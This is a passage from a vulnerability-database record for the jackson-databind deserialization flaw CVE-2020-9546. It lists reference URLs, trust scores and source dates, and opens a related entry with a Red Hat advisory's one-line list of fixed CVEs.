"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-analytics-has-addressed-multiple-vulnerabilities-3/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-code-execution-via-hikari-config-31736"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-affect-ibm-platform-symphony-and-ibm-spectrum-symphony-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-data-risk-manager-is-affected-by-multiple-vulnerabilities/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3558/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2050/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0828/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158048/red-hat-security-advisory-2020-2512-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2042/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158282/red-hat-security-advisory-2020-2813-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1440/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159724/red-hat-security-advisory-2020-4366-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3065/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.4,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6950"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6950"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10719"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10719"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:2813"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-7226"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1729"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7226"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14371"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-14371"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10740"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10687"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14900"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10683"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10683"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10687"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14900"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14307"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10740"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14307"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10718"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10718"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/yahoo/cubed"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhdm\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_decision_manager/7.8/html/release_notes_for_red_hat_decision_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3642"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_single_sign-on/7.4/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=core.service.rhsso\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1694"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1694"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2515"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187671"
},
{
"db": "VULMON",
"id": "CVE-2020-9546"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
},
{
"db": "NVD",
"id": "CVE-2020-9546"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-187671",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-9546",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158048",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159083",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158282",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158038",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-9546",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-02T00:00:00",
"db": "VULHUB",
"id": "VHN-187671",
"ident": null
},
{
"date": "2020-03-02T00:00:00",
"db": "VULMON",
"id": "CVE-2020-9546",
"ident": null
},
{
"date": "2020-07-29T17:52:58",
"db": "PACKETSTORM",
"id": "158650",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-10-27T16:58:42",
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"date": "2020-06-11T16:36:20",
"db": "PACKETSTORM",
"id": "158048",
"ident": null
},
{
"date": "2020-09-07T16:39:48",
"db": "PACKETSTORM",
"id": "159083",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-07-02T15:43:25",
"db": "PACKETSTORM",
"id": "158282",
"ident": null
},
{
"date": "2020-09-07T16:37:51",
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"date": "2020-06-11T16:34:25",
"db": "PACKETSTORM",
"id": "158038",
"ident": null
},
{
"date": "2020-03-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-042",
"ident": null
},
{
"date": "2020-03-02T04:15:10.843000",
"db": "NVD",
"id": "CVE-2020-9546",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-02T00:00:00",
"db": "VULHUB",
"id": "VHN-187671",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-9546",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-042",
"ident": null
},
{
"date": "2024-11-21T05:40:50.133000",
"db": "NVD",
"id": "CVE-2020-9546",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
}
],
"trust": 0.9
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
}
],
"trust": 0.6
}
}
VAR-202003-1786
Vulnerability from variot - Updated: 2026-03-09 20:01FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements.
Security Fix(es):
-
apache-commons-beanutils: does not suppresses the class property in PropertyUtilsBean by default (CVE-2019-10086)
-
cxf: does not restrict the number of message attachments (CVE-2019-12406)
-
cxf: OpenId Connect token service does not properly validate the clientId (CVE-2019-12419)
-
hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)
-
HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
-
HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
-
HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
-
HTTP/2: large amount of data requests leads to denial of service (CVE-2019-9511)
-
jackson-databind: Multiple serialization gadgets (CVE-2019-17531, CVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540, CVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546, CVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968, CVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619, CVE-2020-11620, CVE-2019-20330, CVE-2020-8840)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672, CVE-2020-10673)
-
keycloak: adapter endpoints are exposed via arbitrary URLs (CVE-2019-14820)
-
keycloak: missing signatures validation on CRL used to verify client certificates (CVE-2019-3875)
-
keycloak: SAML broker does not check existence of signature on document allowing any user impersonation (CVE-2019-10201)
-
keycloak: CSRF check missing in My Resources functionality in the Account Console (CVE-2019-10199)
-
keycloak: cross-realm user access auth bypass (CVE-2019-14832)
-
netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
-
SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader (CVE-2020-1729)
-
thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol (CVE-2019-0210)
-
thrift: Endless loop when feed with specific input data (CVE-2019-0205)
-
